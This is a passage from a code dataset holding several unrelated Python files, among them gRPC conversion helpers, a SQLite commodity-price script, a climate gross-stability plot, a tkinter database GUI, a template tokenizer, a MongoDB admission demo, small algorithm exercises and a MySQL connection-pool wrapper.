learner_specs['data'] = json.load(learner_specs_proto.data)\n return learner_specs\n\n@timed\ndef from_dict_2_SpecsProto(specs: dict) -> SpecsProto:\n specs_proto = SpecsProto()\n specs_proto.id = specs['id']\n specs_proto.type = specs['type']\n if 'address' in specs:\n specs_proto.address = specs['address']\n if specs['type'] == ComponentType.LEARNER:\n specs_proto.learner.data = json.dumps(specs['data'])\n elif specs['type'] == ComponentType.MULTIENV:\n specs_proto.menv.num_envs = specs['num_envs']\n specs_proto.menv.env_specs.observation_space = specs['env_specs']['observation_space']\n specs_proto.menv.env_specs.action_space.discrete = specs['env_specs']['action_space']['discrete']\n specs_proto.menv.env_specs.action_space.param = specs['env_specs']['action_space']['param']\n specs_proto.menv.env_specs.action_space.acs_space = specs['env_specs']['action_space']['acs_space']\n elif specs['type'] == ComponentType.ENVIRONMENT:\n pass\n return specs_proto\n\n@timed\ndef from_SpecsProto_2_dict(specs_proto: SpecsProto) -> dict:\n specs = {}\n specs['id'] = specs_proto.id\n specs['type'] = specs_proto.type\n if specs_proto.type == ComponentType.LEARNER:\n specs['learner'] = from_LearnerSpecsProto_2_dict(specs_proto.learner)\n elif specs_proto.type == ComponentType.MULTIENV:\n specs['menv'] = from_MultiEnvSpecsProto_2_dict(specs_proto.menv)\n elif specs_proto.type == ComponentType.ENVIRONMENT:\n specs['env'] = from_EnvSpecsProto_to_dict(specs_proto.env)\n return specs\n\n@timed\ndef from_dict_2_JsonMessage(msg) -> JsonMessage:\n simple = JsonMessage()\n simple.data = json.dumps(msg)\n return simple\n\n@timed\ndef from_JsonMessage_2_dict(simple_msg: JsonMessage) -> dict:\n return json.load(simple_msg.data)\n\n@timed\ndef from_SimpleMessage_2_int(simple_msg_proto: SimpleMessage) -> int:\n assert \"Implementation not checked\"\n return int(simple_msg_proto.data)\n\n@timed\ndef from_SimpleMessage_2_string(simple_msg_proto: SimpleMessage) -> str:\n assert \"Implementation not checked\"\n return str(simple_msg_proto.data)\n\n@timed\ndef from_dict_2_StatusProto():\n assert \"NotImplemented\"\n\n@timed\ndef from_StatusProto_2_dict():\n assert \"NotImplemented\"\n\n\n\n\n#\n#\n#\n#\n#\n#\n\ndef from_action_to_EnvStepInput(actions, command='step'):\n '''\n Need to set convention of actions shape with everybody\n '''\n env_in = EnvStepInput()\n\n fake_id = 0\n\n if len(actions.shape) == 1:\n # 1 Agent, 1 Instance\n action_obj = env_in.agent_actions[str(fake_id)].data.add()\n action_obj.data.extend(actions.tolist())\n if len(actions.shape) == 2:\n # 1 Agent, n Instances\n for 
instance_n in actions:\n action_obj = env_in.agent_actions[str(fake_id)].data.add()\n action_obj.data.extend(actions[instance_n])\n if len(actions.shape) == 3:\n # m Agents, n Instances\n for agent_m in range(actions.shape[0]):\n action_obj = env_in.agent_actions[str(fake_id)].data.add()\n for instance_n in range(actions.shape[1]):\n action_obj.data.extend(actions[agent_m, instance_n])\n fake_id += 1\n\n env_in.command = EnvironmentCommand.STEP\n return env_in\n\ndef from_EnvStepOutput_to_trajectories(env_output):\n '''\n This helper parses the EnvStepOutput into a dictionary @trajectories\n '''\n agent_ids = list(env_output.agent_states.keys())\n trajectories = {}\n for a_id in agent_ids:\n trajectories[a_id] = []\n for state in list(env_output.agent_states[a_id].data):\n trajectories[a_id].append([state.next_observation.data, state.reward, state.done, {}])\n return trajectories\n\ndef from_EnvStepOutput_to_metrics(env_output):\n agent_ids = list(env_output.agent_metrics.keys())\n agent_id = agent_ids[0] # SINGLE AGENT PROCESSING\n metric = {}\n for a_id in agent_ids:\n metric[a_id] = env_output.agent_metrics[a_id].data[0]\n return metric","sub_path":"shiva/archive/eze/grpc_utils.py","file_name":"grpc_utils.py","file_ext":"py","file_size_in_byte":8264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"621921305","text":"import pandas as pd\nfrom sql_control import SqlControl\n\nclass Spot(SqlControl):\n def __init__(self):\n print(\"Start to create spot.\")\n # server start\n #sf database\n SqlControl.__init__(self)\n SqlControl.open_sf_conn(self)\n #Commodity database\n SqlControl.open_commodity_conn(self)\n self.spot_tb_name = 'spot'\n #------------------------------------------------------------------------------------------\n sfTbList = self.table_list() # table name list from sf database\n tbName = sfTbList[-1] # last table of sf\n spotList = self.get_spot_name(tbName)\n self.create_spot_tb(spotList, sfTbList) # create the commodity db\n self.insert_commodity(spotList, sfTbList)\n self.storage_spot_to_excel() #read spot db and to excel\n #------------------------------------------------------------------------------------------\n #close server\n SqlControl.close_commodity_conn(self)\n SqlControl.close_sf_conn(self)\n print(\"Spot table created!\")\n\n #return table name string in list\n def table_list(self):\n tbList = self.sf_cursor.execute(\"SELECT name FROM sqlite_master WHERE type='table'order by name;\").fetchall()\n for i in range(len(tbList)):\n tbList[i] = tbList[i][0]\n return tbList\n\n def create_spot_tb(self, spotList, sfTbList):\n tbName = self.spot_tb_name # name of the table with all commodity.\n #check if table existed than delete the table\n if self.check_table(tbName):\n sqlDrop = \"DROP TABLE {0};\".format(tbName)\n self.com_cursor.execute(sqlDrop)\n # create an empty table only with id and date in string\n sqlCreate = \"CREATE TABLE {0} ('日期' text primary key);\".format(tbName)\n self.com_cursor.execute(sqlCreate)\n # use loop to add all spot into the table as field\n for s in spotList:\n sqlAddSpot = \"ALTER table {0} add '{1}' real;\".format(tbName, s)\n self.com_cursor.execute(sqlAddSpot)\n # insert the dateTime to the spot table as index, later for updating the table data with sql update wording\n for sf in sfTbList:\n # get table date time as string, in order to store into the spot list as index\n dateTime = sf.replace(\"sf\", \"\")\n sqlDate = \"INSERT INTO {0} ('日期') VALUES ({1});\".format(tbName, 
dateTime)\n self.com_cursor.execute(sqlDate)\n\n def get_spot_name(self, tbName):\n #read the lastest database and return the name list of spot\n sql = \"SELECT 商品 from {0};\".format(tbName)\n spotList = self.sf_cursor.execute(sql).fetchall()\n for i in range(len(spotList)):\n spotList[i] = spotList[i][0]\n return spotList\n\n #check table existed\n def check_table(self, tbName):\n sqlCheck = \"SELECT COUNT(*) from sqlite_master WHERE type= 'table' and name = '{0}';\".format(tbName)\n self.com_cursor.execute(sqlCheck)\n #if table existed, than true.\n res = self.com_cursor.fetchone()\n if res == (1,):\n return True\n else:\n return False\n\n def insert_commodity(self, spotList, sfTbList):\n # loop for all sf tables\n for sf in sfTbList:\n # get table date time as string, in order to store into the spot list\n dateTime = sf.replace(\"sf\", \"\")\n # loop for all spot in one table\n for sp in spotList:\n # get spot price from sf table\n # select 现货价格 from table sf in upper loop where 商品 = sp in lower loop\n sqlGet = \"SELECT 现货价格 FROM {0} WHERE 商品 = '{1}'\".format(sf, sp)\n spotPrice = self.sf_cursor.execute(sqlGet).fetchall()\n try:\n spotPrice = spotPrice[0][0]\n except:\n spotPrice = 0\n # insert price to spot table\n # inser into table spot (商品名称) values (商品价格) by update\n sqlInsert = \"UPDATE {0} SET '{1}' = {2} WHERE 日期 = '{3}';\".format(self.spot_tb_name, sp, spotPrice, dateTime)\n self.com_cursor.execute(sqlInsert)\n\n def storage_spot_to_excel(self):\n sqlReadSpot = \"SELECT * FROM spot\"\n dfContent = pd.read_sql(sqlReadSpot, self.com_conn)\n excel_path = \"{0}/database/SpotData.xlsx\".format(self.BASE_DIR)\n dfContent.to_excel(excel_path)\n\n\nif __name__ == '__main__':\n a = Spot()\n","sub_path":"app/create_spot.py","file_name":"create_spot.py","file_ext":"py","file_size_in_byte":4542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"341598561","text":"\"\"\"\nReproduce moist versions of figures 8 and 9 from SB08 using data from the updated ap_2 run. \nUse Emanuel 1995 (On Thermally Direct Circulations...) angular momentum conserving equivalent \npotential temperature (12/11/2018)\n\"\"\"\n\nimport xarray as xr\nimport sh\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom data_handling_updates import gradients as gr, model_constants as mc, make_sym\nfrom climatology import precip_centroid\nfrom pylab import rcParams\nfrom hadley_cell import mass_streamfunction, get_edge_psi\n\n\ndef find_change_lat(div_vt, sanity_check=False):\n # Find latitudes at which div(vt) changes from positive to negative, and set other values to NaN\n sign_changes = ((div_vt >=0.).astype(float).diff('lat') <0.).astype('float')*div_vt.lat\n sign_changes.values[sign_changes.values==0.] = np.nan\n \n # Find the location of the minimum div(vt), the sign change we want will be just south of this\n div_vt_min_loc = div_vt.lat.values[div_vt.argmin('lat').values]\n div_vt_min_loc = xr.DataArray(div_vt_min_loc, coords=[div_vt.xofyear], dims=['xofyear'])\n \n # Subtract the location of the sign changes from that of the minimum and exclude values north of the min\n distance_to_min = (div_vt_min_loc - sign_changes)\n distance_to_min.values[distance_to_min.values<0.] 
= np.nan\n \n # The closest value to the minimum is the one we want\n change_index = distance_to_min.argmin('lat')\n change_lat = xr.DataArray(div_vt.lat.values[change_index.values], coords=[div_vt.xofyear], dims=['xofyear'])\n \n if sanity_check==True:\n div_vt.plot.contourf(x='xofyear', y='lat')\n change_lat.plot()\n plt.show()\n return change_index, change_lat\n\n\ndef gross_stability(run, moist=False, i=1):\n\n data = xr.open_dataset('/disca/share/rg419/Data_moist/climatologies/' + run + '.nc')\n \n convTtotheta=(1000./data.pfull)**mc.kappa\n \n theta = data.temp * convTtotheta\n theta_equiv = (data.temp + mc.L/mc.cp_air * data.sphum/(1-data.sphum)) * convTtotheta\n \n dthetady = gr.ddy(theta.mean('lon'), vector=False)\n dthetadp = gr.ddp(theta.mean('lon'))\n dthetady_equiv = gr.ddy(theta_equiv.mean('lon'), vector=False)\n dthetadp_equiv = gr.ddp(theta_equiv.mean('lon'))\n \n vdthetady_mean = data.vcomp.mean('lon') * dthetady\n wdthetadp_mean = data.omega.mean('lon') * dthetadp\n vdthetady_mean_equiv = data.vcomp.mean('lon') * dthetady_equiv\n wdthetadp_mean_equiv = data.omega.mean('lon') * dthetadp_equiv\n \n def column_int(var_in):\n var_int = mc.cp_air * var_in.sum('pfull')*5000./mc.grav\n return var_int\n \n div_vt_mean_int = -1. * column_int(wdthetadp_mean + vdthetady_mean)\n div_vt_mean_int_equiv = -1. * column_int(wdthetadp_mean_equiv + vdthetady_mean_equiv)\n \n vt_mean_int = column_int(data.vcomp.mean('lon') * theta.mean('lon'))\n vt_mean_int_equiv = column_int(data.vcomp.mean('lon') * theta_equiv.mean('lon'))\n #vt_mean_int.plot.contourf(x='xofyear', y='lat')\n \n psi = mass_streamfunction(data, a=6376.0e3, dp_in=50.)\n #psi /= 1.e9\n psi = np.abs(psi).max('pfull')\n #plt.figure(2)\n #psi.plot.contourf(x='xofyear', y='lat')\n \n gross_stab = (2.*np.pi * mc.a * np.cos(data.lat*np.pi/180.) * np.abs(vt_mean_int))/psi\n gross_moist_stab = (2.*np.pi * mc.a * np.cos(data.lat*np.pi/180.) 
* np.abs(vt_mean_int_equiv))/psi\n plt.figure(i)\n gross_moist_stab.plot.contourf(x='xofyear', y='lat', levels=np.arange(0., 2.e5, 2.e4))\n #plt.show()\n \n \ngross_stability('sn_1.000_evap_fluxes_heattrans')\ngross_stability('rt_0.500_heatbudg', i=2)\ngross_stability('rt_0.750_heatbudg', i=3)\ngross_stability('rt_1.250_heatbudg', i=4)\ngross_stability('rt_1.500_heatbudg', i=5)\nplt.show()","sub_path":"paper_2_figs/gross_stability.py","file_name":"gross_stability.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"169580976","text":"import Storage\nimport tkinter\nfrom tkinter import *\nfrom tkinter import messagebox\n\n\ndef show_data_bases():\n data_bases = Storage.showDatabases()\n tree_window = Toplevel(main_window)\n main_window.iconify()\n tree_window.geometry('800x600')\n tree_window.title('Bases de datos')\n main_tree = Frame(tree_window)\n main_tree.pack(fill=BOTH, expand=1)\n canvas_tree = Canvas(main_tree, width=800, height=600)\n canvas_tree.place(x=0, y=0)\n scroll = Scrollbar(main_tree, orient=VERTICAL, command=canvas_tree.yview)\n scroll.pack(side=RIGHT, fill=Y)\n canvas_tree.configure(yscrollcommand=scroll.set)\n canvas_tree.bind('', lambda e: canvas_tree.configure(scrollregion=canvas_tree.bbox('all')))\n scroll_tree = Scrollbar(main_tree, orient=HORIZONTAL, command=canvas_tree.xview)\n scroll_tree.pack(side=BOTTOM, fill=X)\n canvas_tree.configure(xscrollcommand=scroll_tree.set)\n canvas_tree.bind('', lambda e: canvas_tree.configure(scrollregion=canvas_tree.bbox('all')))\n frame_tree = Frame(canvas_tree)\n canvas_tree.create_window((100, 0), width=1000, height=1000, window=frame_tree, anchor='nw')\n canvas_tree.image = PhotoImage(file='C:/Users/Marcos/Desktop/Data/DataBases.png')\n Button(frame_tree, image=canvas_tree.image).pack()\n Label(frame_tree, bg='#C4D3CB', width=200, height=200).place(x=0, y=0)\n Label(frame_tree, image=canvas_tree.image).place(x=150, y=20)\n Button(canvas_tree, text='Regresar', padx=20, pady=5, font='Helvetica 8 bold italic', bg='#FF6666',command=lambda: close_table_window(tree_window, main_window)).place(x=0, y=0)\n y = 200\n n = 0\n top = 600\n for x in data_bases:\n Button(frame_tree, text=x, font='Helvetica 8 bold italic', bg='#CCFF99', padx=15, pady=3).place(x=y, y=top)\n n += 1\n y += 80\n if n == 5:\n n = 0\n y = 200\n top += 30\n\ndef show_functions():\n main_window.iconify()\n function_window = Toplevel(main_window)\n function_window.title('Funciones de las bases de datos')\n function_window.geometry('600x600')\n #function_canvas = Canvas(function_window, width=600, height=600)\n #function_canvas.image = PhotoImage(file='fondo_bases.png')\n #tkinter.Label(function_window, image=function_canvas.image).place(x=0, y=0)\n Button(function_window, text='Regresar', padx=20, pady=5, font='Helvetica 8 bold italic', bg='#FF6666',command=lambda: close_table_window(function_window, main_window)).place(x=0, y=0)\n tkinter.Label(function_window,text='Create Database',font='Helvetica 10 bold italic', width=20).place(x=10, y=50)\n database_name = Entry(function_window,width=20)\n database_name.place(x=150,y=50)\n tkinter.Button(function_window, text='Create',font='Helvetica 10 bold italic', width=10, command= lambda : create_database(database_name.get(),database_name)).place(x=250, y=45)\n tkinter.Label(function_window, text='Alter Database', font='Helvetica 10 bold italic', width=20).place(x=10, y=100)\n alter_data_base = Entry(function_window, width=20)\n 
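    # NOTE (added by the editor): alter_database() below splits this entry's text on ','\n    # and expects input of the form 'old_name,new_name'; a value without a comma\n    # raises an IndexError before Storage.alterDatabase(old, new) is ever reached.\n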
alter_data_base.place(x=150, y=100)\n tkinter.Button(function_window, text='Alter', font='Helvetica 10 bold italic', width=10, command=lambda: alter_database(alter_data_base.get(), alter_data_base)).place(x=250, y=95)\n\n\ndef create_database(database,database_name):\n if database:\n result = Storage.createDatabase(database)\n if result == 0:\n messagebox.showinfo(title='Create Database', message='Operacion exitosa')\n elif result == 1:\n messagebox.showinfo(title='Create Database', message='Error en la operacion')\n elif result == 2:\n messagebox.showinfo(title='Create Database', message='Base de datos existente')\n database_name.delete(0,END)\n else:\n messagebox.showinfo(title='Create Database', message='No escribio un nombre')\n print('No qlon')\n\ndef alter_database(info, alter_data_base):\n if info:\n print(info)\n new_name = info.split(',')\n result = Storage.alterDatabase(new_name[0], new_name[1])\n if result == 0:\n messagebox.showinfo(title='Create Database', message='Operacion exitosa')\n elif result == 1:\n messagebox.showinfo(title='Create Database', message='Error en la operacion')\n elif result == 2:\n messagebox.showinfo(title='Create Database', message=new_name[0] + ' no existe')\n elif result == 3:\n messagebox.showinfo(title='Create Database', message=new_name[1] + ' ya existe')\n alter_data_base.delete(0, END)\n else:\n messagebox.showinfo(title='Create Database', message='No escribio un nombre')\n\ndef close_table_window(window, parent):\n window.destroy()\n parent.deiconify()\n\n\n\n\nmain_window = tkinter.Tk()\nmain_window.geometry('600x500')\nmain_window.title('Tytus EDD: Fase 1')\n#imagen = PhotoImage(file='imagenEDD.png')\n#tkinter.Label(main_window, image=imagen).place(x=0, y=0)\ntkinter.Label(main_window, text='Estructuras de datos: Grupo 18', font='Helvetica 16 bold italic', bg='#99CCFF',padx=10, pady=5).place(x=200, y=20)\ntkinter.Button(main_window, text='Reportes', font='Helvetica 16 bold italic', bg='#CCFF99', width=20, height=2, command=show_data_bases).place(x=10, y=100)\ntkinter.Button(main_window, text='Funciones', font='Helvetica 16 bold italic',bg='#CCFF99',width=20, height=2, command=show_functions).place(x=10, y=200)\nmain_window.mainloop()","sub_path":"storage/team18/Interfazz.py","file_name":"Interfazz.py","file_ext":"py","file_size_in_byte":5522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"243225092","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# 导入系统模块\nimport re\nimport os\nfrom enum import Enum\nfrom node import Node, TextNode, VariableNode, NodeList\n\n# 第三方模块\n\n# 导入自定义模块\n\n# 设置环境变量\n\nBLOCK_TAG_START = '{%'\nBLOCK_TAG_END = '%}'\nVARIABLE_TAG_START = '{{'\nVARIABLE_TAG_END = '}}'\nCOMMENT_TAG_START = '{#'\nCOMMENT_TAG_END = '#}'\n# TRANSLATOR_COMMENT_MARK = 'Translators'\n# SINGLE_BRACE_START = '{'\n# SINGLE_BRACE_END = '}'\n\ntag_re = (re.compile('(%s.*?%s|%s.*?%s|%s.*?%s)' %\n (re.escape(BLOCK_TAG_START), re.escape(BLOCK_TAG_END),\n re.escape(VARIABLE_TAG_START), re.escape(VARIABLE_TAG_END),\n re.escape(COMMENT_TAG_START), re.escape(COMMENT_TAG_END))))\n\n\nclass TokenType(Enum):\n TEXT = 0\n VAR = 1\n BLOCK = 2\n COMMENT = 3\n\n\nclass Token:\n def __init__(self, token_type, contents, position=None, lineno=None):\n \"\"\"\n 表示模板中字符串的标记。\n :param token_type: 标记类型,可以是.TEXT、.VAR、.BLOCK或.COMMENT。\n :param contents: 源字符串\n :param position: 包含令牌的起始和结束索引的可选元组\n :param lineno: 标记出现在模板源中的行号。\n \"\"\"\n self.token_type, self.contents = token_type, contents\n self.lineno = 
lineno\n self.position = position\n pass\n\n def __str__(self):\n token_name = self.token_type.name.capitalize()\n return ('<%s token: \"%s...\">' %\n (token_name, self.contents[:20].replace('\\n', '')))\n\n # def split_contents(self):\n # split = []\n # bits = smart_split(self.contents)\n # for bit in bits:\n # # Handle translation-marked template pieces\n # if bit.startswith(('_(\"', \"_('\")):\n # sentinel = bit[2] + ')'\n # trans_bit = [bit]\n # while not bit.endswith(sentinel):\n # bit = next(bits)\n # trans_bit.append(bit)\n # bit = ' '.join(trans_bit)\n # split.append(bit)\n # return split\n\n\nclass Template(object):\n def __init__(self, template_file_path):\n self.template_string = self.load_template_string(template_file_path)\n\n @staticmethod\n def load_template_string(template_file_path):\n with open(template_file_path, 'r', encoding='UTF-8') as f:\n template_string = f.read()\n return template_string\n\n def tokenize(self):\n \"\"\"\n Split a template string into tokens and annotates each token with its\n start and end position in the source. This is slower than the default\n lexer so only use it when debug is True.\n \"\"\"\n lineno = 1\n result = []\n upto = 0\n # r = tag_re.finditer(self.template_string)\n # print(r)\n for match in tag_re.finditer(self.template_string):\n start, end = match.span()\n if start > upto:\n token_string = self.template_string[upto:start]\n result.append(self.create_token(token_string, (upto, start), lineno, in_tag=False))\n lineno += token_string.count('\\n')\n upto = start\n token_string = self.template_string[start:end]\n result.append(self.create_token(token_string, (start, end), lineno, in_tag=True))\n lineno += token_string.count('\\n')\n upto = end\n last_bit = self.template_string[upto:]\n if last_bit:\n pass\n result.append(self.create_token(last_bit, (upto, upto + len(last_bit)), lineno, in_tag=False))\n return result\n\n def create_token(self, token_string, position, lineno, in_tag):\n # # return Token(TokenType.TEXT, token_string, position, lineno)\n # if in_tag and token_string.startswith(BLOCK_TAG_START):\n # block_content = token_string[2:-2].strip()\n # print(block_content)\n\n if in_tag:\n if token_string.startswith(VARIABLE_TAG_START):\n return Token(TokenType.VAR, token_string[2:-2].strip(), position, lineno)\n elif token_string.startswith(BLOCK_TAG_START):\n block_content = token_string[2:-2].strip()\n return Token(TokenType.BLOCK, block_content, position, lineno)\n else:\n return Token(TokenType.COMMENT, token_string[2:-2].strip(), position, lineno)\n else:\n return Token(TokenType.TEXT, token_string, position, lineno)\n\n\nclass Parser:\n def __init__(self, tokens):\n self.tokens = tokens\n self.command_stack = []\n\n def parse(self):\n nodelist = NodeList()\n while self.tokens:\n token = self.next_token()\n if token.token_type.value == 0: # TokenType.TEXT\n self.extend_nodelist(nodelist, TextNode(token.contents), token)\n elif token.token_type.value == 1: # TokenType.VAR\n if not token.contents:\n raise ValueError(token, 'Empty variable tag on line %d' % token.lineno)\n\n self.extend_nodelist(nodelist, VariableNode(token.contents), token)\n elif token.token_type.value == 2: # TokenType.BLOCK\n pass\n try:\n command = token.contents.split()[0]\n print(command)\n except IndexError:\n raise self.error(token, 'Empty block tag on line %d' % token.lineno)\n\n self.command_stack.append((command, token))\n new_nodelist = NodeList()\n self.extend_nodelist(nodelist, new_nodelist, token)\n nodelist = new_nodelist\n\n def 
next_token(self):\n        return self.tokens.pop(0)\n\n\n    def extend_nodelist(self, nodelist, node, token):\n        # node.token = token\n        nodelist.append(node)\n\n\nif __name__ == '__main__':\n    t = Template('1.html')\n    r = t.tokenize()\n    p = Parser(r)\n    p.parse()","sub_path":"Template_Test/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":6010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"366871072","text":"import pymongo\nimport pprint\nimport numpy as np\nfrom pymongo import MongoClient\n\nclient=MongoClient()\nclient = MongoClient('localhost', 27017)\ndb = client['btp']\ncollection = db['collegedemos']\nstudents=db.studentdemos\na=students.count()\n#students.delete_many({\"diaplay\": \"1\"})\nperson=students.find_one({\"inserteddoc\": \"1\"})\n\nsquant=person[\"quant\"]\nsundergrad=person[\"undergrad\"]\nsverb=person[\"verbal\"]\nsawa=person[\"awa\"]\nscol=person[\"college\"]\nscpi=person[\"CPI\"]\nstofel=person[\"TOFEL\"]\nsbranch=person[\"spl\"]\nsmaxcpi=person[\"maxcpi\"]\n\n\n\n#pprint.pprint(students.update_one({\"inserteddoc\": \"1\"}, {\"$set\" : {\"inserteddoc\": \"0\"}}))\n#students.delete_one({\"inserteddoc\": \"1\"})\ncolleges=db.collegedemos\n\n#colleges.update_one({\"Branch\":\"Computer Science\",\"undergrad\":\"IIT BHU\",\"constant\":\"-6.6986\",\"TOFEL\":\"105.4099\",\"quant\":\"-191.8623\",\"verbal\":\"253.4097\",\"awa\":\"-204.1384\",\"college\":\"Texas\",\"CPI\":\" 2497.0398\",\"maxcpi\":\"-127.9907\"})\n\n#for student in students.find():\n#\tpprint.pprint(student)\n\n#colleges.delete_one({\"_id\": \"5ae8aef0ec098d386627467b\"})\n\nclg=colleges.find_one({\"Branch\":sbranch,\"college\":scol,\"undergrad\":sundergrad})\ncconst=clg[\"constant\"]\nctofel=clg[\"TOFEL\"]\ncquant=clg[\"quant\"]\ncverb=clg[\"verbal\"]\ncawa=clg[\"awa\"]\nccpi=clg[\"CPI\"]\ncmaxcpi=clg[\"maxcpi\"]\n\ntofel=(float(stofel)*float(ctofel))\nquant=(float(cquant)*float(squant))\n#print(quant)\nverb=(float(cverb)*float(sverb))\nawa=(float(cawa)*float(sawa))\ncpi=(float(ccpi)*float(scpi))\nmaxcpi=(float(cmaxcpi)*float(smaxcpi))\n\n\n\ncfinal=float(cconst)+float(tofel)+float(quant)+float(verb)+float(awa)+float(cpi)+float(maxcpi)\ncfin=np.sign(cfinal)\n\nif(cfin==1):\n\tstudents.update_one({\"result\": \"1\",\"inserteddoc\": \"1\"}, {\"$set\" : {\"result\": \"can be selected\"}})\nelse:\n\tstudents.update_one({\"result\": \"1\",\"inserteddoc\": \"1\"}, {\"$set\" : {\"result\": \"cannot be selected\"}})\n\n\nstudents.update_one({\"inserteddoc\": \"1\"}, {\"$set\" : {\"inserteddoc\": \"0\"}})\n\n\n\n\n","sub_path":"ml_demo.py","file_name":"ml_demo.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"45232307","text":"# Complete the function solution that, given a list L and an element x (both passed as\n# arguments), finds every index at which x occurs in L and returns those indexes as a list.\n# Assume L consists of integers in an arbitrary order, and the same element may appear\n# more than once. If the integer x is present in L, collect all of its indexes into a list\n# and return it; if it is not present, return the single-element list [-1].\n\n# For example, if L = [64, 72, 83, 72, 54] and x = 72, the correct return value is [1, 3].\n# As another example, if L = [64, 72, 83, 72, 54] and x = 83, the correct return value is [2].\n# Finally, if L = [64, 72, 83, 72, 54] and x = 49, the correct return value is [-1].\n\ndef solution(L, x):\n    answer = []\n\n    if x not in L:\n        answer = [-1]\n    else:\n        for i in range(len(L)):\n            if x == L[i]:\n                answer.append(i)\n    return answer","sub_path":"Algorithm/2. 
Linear Array/search/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"221532386","text":"#Given an m x n binary matrix mat, return the distance of the nearest 0 for each cell.\n\n#The distance between two adjacent cells is 1.\n\n#Example 1:\n#Input: mat = [[0,0,0],[0,1,0],[0,0,0]]\n#Output: [[0,0,0],[0,1,0],[0,0,0]]\n\n#Example 2:\n#Input: mat = [[0,0,0],[0,1,0],[1,1,1]]\n#Output: [[0,0,0],[0,1,0],[1,2,1]]\n\n\n#This solution will look at each position in the matrix outside to in. So I will be looking for places where a solution is possible working from the smallest numbers to the\n#largest. I'll get more on that in a second.\nclass Solution:\n def updateMatrix(self, mat: List[List[int]]) -> List[List[int]]:\n newMat = mat\n count = 0\n mem = []\n #We will be storing where we need to look for values in an array, mem as we don't want to have to iterate through the matrix more than we need to.\n \n #This is establishing where we already know we have solutions and where we need to find them. If the matrix is already a zero, we leave it alone. If not, we store\n #that position to be calculated later.\n for i in range(len(mat)):\n for j in range(len(mat[0])):\n if mat[i][j] == 0:\n count += 1 \n else:\n newMat[i][j] = -1\n mem.append([i,j])\n \n #Index will be used to keep track of where we are in the solution. For the first loop, we will be looking for cells whose solution is one cell away from an answer.\n #This will mean that it is in close proximity to a zero. For the second loop, we will be looking for a \"1\" because these cells are one away from the solution.\n #In this way we will be using previous solutions in order to find the new solutions, making this a dynamic problem. 
I am solving it this way because this will guarantee\n #that the solution for each cell will be the smallest possible value.\n index = 0\n total = len(mat) * len(mat[0])\n while count < total:\n running = len(mem)\n for i in range(running):\n [row, col] = mem.pop(0) #if we find a solution to this cell, it will remain popped, so it doesn't reappear later.\n if row + 1 < len(mat) and newMat[row + 1][col] == index:\n newMat[row][col] = index + 1\n count += 1\n elif col + 1 < len(mat[0]) and newMat[row][col + 1] == index:\n newMat[row][col] = index + 1\n count += 1\n elif row - 1 >= 0 and newMat[row - 1][col] == index:\n newMat[row][col] = index + 1\n count += 1\n elif col - 1 >= 0 and newMat[row][col - 1] == index:\n newMat[row][col] = index + 1\n count += 1\n else:\n mem.append([row, col]) #if we don't find a solution, we put this cell back into memory to be solved later.\n index += 1\n return newMat\n","sub_path":"01Matrix.py","file_name":"01Matrix.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"130939196","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n@File : db_mysql.py\n@Time : 2021/4/28 11:43 上午\n@Author : yuecong\n@Email : yueconger@163.com\n@Software: PyCharm\n\"\"\"\nimport datetime\nimport json\n\nimport pymysql\nfrom DBUtils.PooledDB import PooledDB\nfrom pymysql import cursors\nfrom pymysql import err\n\nfrom utils.log_custom import logger\n\nlog = logger.log\n\n\ndef auto_retry(func):\n def wapper(*args, **kwargs):\n for i in range(3):\n try:\n return func(*args, **kwargs)\n except (err.InterfaceError, err.OperationalError, err.ProgrammingError) as e:\n log.error('''\n error:%s\n sql: %s\n ''' % (e, kwargs.get('sql') or args[1]))\n\n return wapper\n\n\nclass MysqlDB():\n\n def __init__(self, ip=None, port=None, db=None, user=None, passwd=None, **kwargs):\n\n # 可能会改setting中的值,所以此处不能直接赋值为默认值,需要后加载赋值\n try:\n db_start = pymysql.connect(host=ip, user=user, password=passwd, port=port)\n db_cursor = db_start.cursor()\n self.get_version_sql(db_cursor)\n # 初始化时先判读是否存在数据库db,没有则新建\n self._create_database_sql(db_cursor, db)\n db_start.close()\n\n self.connect_pool = PooledDB(creator=pymysql, mincached=1, maxcached=100, maxconnections=100, blocking=True,\n ping=7,\n host=ip, port=port, user=user, passwd=passwd, db=db, charset='utf8mb4',\n cursorclass=cursors.SSCursor) # cursorclass 使用服务的游标,默认的在多线程下大批量插入数据会使内存递增\n except Exception as e:\n input('''\n ******************************************\n 未链接到mysql数据库,\n 您当前的链接信息为:\n ip = {}\n port = {}\n db = {}\n user = {}\n passwd = {}\n 请参考教程正确安装配置mysql,然后重启本程序 \n Exception: {}'''.format(ip, port, db, user, passwd, str(e))\n )\n import sys\n sys.exit()\n\n def _create_database_sql(self, db_cursor, db):\n db_cursor.execute(\"CREATE DATABASE IF NOT EXISTS `%s` DEFAULT CHARACTER SET utf8mb4;\" % db)\n log.info(f'数据库 {db} 初始化完毕')\n\n def get_version_sql(self, db_cursor):\n db_cursor.execute('SELECT VERSION()')\n data = db_cursor.fetchone()\n log.info(f'sql版本: {data[0]}')\n\n def get_connection(self):\n conn = self.connect_pool.connection(shareable=False)\n # cursor = conn.cursor(cursors.SSCursor)\n cursor = conn.cursor()\n\n return conn, cursor\n\n def close_connection(self, conn, cursor):\n cursor.close()\n conn.close()\n\n def size_of_connections(self):\n '''\n 当前活跃的连接数\n @return:\n '''\n return self.connect_pool._connections\n\n def size_of_connect_pool(self):\n '''\n 